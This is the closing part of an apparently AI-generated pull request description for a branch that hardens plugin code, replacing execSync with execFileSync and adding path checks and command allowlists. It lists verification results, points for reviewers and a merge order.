- 1b35ed10 chore(diff-summary): drop unused execSync import after execFileSync migration

## Verification

- `pnpm vitest run packages/plugins/tests` → **813/813 passed** across 47 test files
- `pnpm --filter @wrongstack/plugins typecheck` → 0 errors / 0 warnings
- `biome format` → 0 changes
- `biome lint` → 0 errors / 0 warnings
- `git log main..HEAD` → 7 commits, scoped to `packages/plugins/src/<plugin>/` + `packages/plugins/tests/<plugin>*.test.ts` only

## Review focus

1. **`withinProject()` correctness** — relative paths, absolute paths, Windows backslashes (the `dirPath/${filename}` concat in file-watcher; I replaced `path.extname` with manual logic).
2. **`execFileSync` argv shape** — verify no path ever lands inside a shell-interpreted string (pay attention to diff-summary's `-U${contextLines}` flag, format-on-save's `npx biome`, test-runner-gate's split of `runner.command`).
3. **Allowlist coverage** — test-runner-gate's `ALLOWED_COMMAND_TOKENS` and import-organizer's `ALLOWED_FIRST_TOKENS`. Legitimate commands operators might set that fall through?
4. **Test chdir side-effects** — shell-check-exec and import-organizer tests now `process.chdir(tmpDir)` in `beforeEach`. Confirm `afterEach` reliably restores cwd.
5. **No main edits** — `git diff main..HEAD` touches only `packages/plugins/`.

## Merge order

Should land after `fix/plugin-readme-and-safety` (peer e3394fdd's work) since both branches edit overlapping files in `packages/plugins/`. Sequence:

1. Merge `fix/plugin-readme-and-safety` first (peer branch).
2. Re-run `pnpm vitest run packages/plugins/tests` from main.
3. Merge this branch with `--no-ff` to preserve the audit history.
4. Final test/typecheck/lint verification on main.

🤖 Generated by [WrongStack](https://github.com/WrongStack/WrongStack)
